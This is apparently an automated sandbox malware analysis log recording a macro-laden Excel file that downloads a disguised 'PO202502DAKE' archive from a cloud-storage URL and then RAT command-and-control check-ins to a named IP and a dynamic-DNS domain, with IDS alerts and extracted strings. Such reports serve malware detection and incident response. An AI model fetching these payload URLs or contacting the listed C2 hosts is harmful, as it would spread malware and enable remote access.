                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443

                          Networking

                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49731 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49733 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49730 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49734 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49735 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49732 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49744 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49745 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49749 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49751 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49740 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49750 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49758 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49755 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49753 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49756 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49757 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49765 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49752 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49766 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49770 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49758 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49743 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49765 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49759 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49768 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49760 -> 84.38.129.34:3369
                          Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49763 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49747 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49769 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49761 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49746 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49752 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49748 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49773 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49775 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49754 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49774 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49776 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49781 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49762 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49784 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49779 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49771 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49771 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49746 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49777 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49777 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49741 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49778 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49782 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49783 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49772 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49740 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49783 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49742 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49730 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49780 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49767 -> 84.38.129.34:3369
                          Source: Malware configuration extractor | URLs: myasyncrat.ddns.net
                          Source: unknown | DNS query: name: myasyncrat.ddns.net
                          Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 84.38.129.34:3369
                          Source: Joe Sandbox View | IP Address: 149.137.128.16
                          Source: Joe Sandbox View | IP Address: 13.107.246.60
                          Source: Joe Sandbox View | ASN Name: DATACLUB-NL
                          Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                          Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 13.107.246.60:443
                          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 13.107.246.60:443
                          Source: global traffic | HTTP traffic detected:
                              GET /file/mdocument/PO202502DAKE.zip HTTP/1.1
                              Accept: */*
                              Accept-Language: en-ch
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: f004.backblazeb2.com
                              Connection: Keep-Alive
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_0000000140024D00 recv
                          Source: global traffic | HTTP traffic detected:
                              GET /file/mdocument/PO202502DAKE.zip HTTP/1.1
                              Accept: */*
                              Accept-Language: en-ch
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: f004.backblazeb2.com
                              Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected:
                              GET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                              Host: otelrules.svc.static.microsoft
                          Source: global traffic | HTTP traffic detected:
                              GET /rules/rule120603v8s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                              Host: otelrules.svc.static.microsoft
                          Source: global traffic | HTTP traffic detected:
                              GET /rules/rule120607v1s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                              Host: otelrules.svc.static.microsoft
                          Source: global traffic | DNS traffic detected: DNS query: f004.backblazeb2.com
                          Source: global traffic | DNS traffic detected: DNS query: myasyncrat.ddns.net
                          Source: global traffic | DNS traffic detected: DNS query: otelrules.svc.static.microsoft
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: PO202502DAKE.exe.9.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0A
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0C
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://ocsp.digicert.com0X
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.dr | String found in binary or memory: http://www.digicert.com/CPS0
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317182210.00007FFC9D073000.00000004.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316889044.00007FFC9CE2B000.00000004.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455966611.00007FFC9CFC3000.00000004.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454840473.00007FFC9CD7B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1537822596.00007FFC9CE2B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1538126610.00007FFC9D073000.00000004.00000001.01000000.0000000F.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.dr | String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317182210.00007FFC9D073000.00000004.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316889044.00007FFC9CE2B000.00000004.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455966611.00007FFC9CFC3000.00000004.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454840473.00007FFC9CD7B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1537822596.00007FFC9CE2B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1538126610.00007FFC9D073000.00000004.00000001.01000000.0000000F.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.dr | String found in binary or memory: https://aka.ms/dotnet-warnings/
                          Source: PO202502DAKE.exe, 00000021.00000002.1537822596.00007FFC9CE2B000.00000004.00000001.01000000.00000010.sdmp | String found in binary or memory: https://aka.ms/nativeaot-compatibility
                          Source: PO202502DAKE.exe, 00000021.00000002.1538126610.00007FFC9D073000.00000004.00000001.01000000.0000000F.sdmp | String found in binary or memory: https://aka.ms/nativeaot-compatibility0
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.dr | String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.dr | String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                          Source: vbaProject.bin | String found in binary or memory: https://f004.backblazeb2.com/f
                          Source: vbaProject.bin | String found in binary or memory: https://f004.backblazeb2.com/file/mdocument/PO202502DAKE.zip
                          Source: vbaProject.bin | String found in binary or memory: https://f004.backblazeb2.com/file/mdocument/PO202502SNAKWS.zip
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
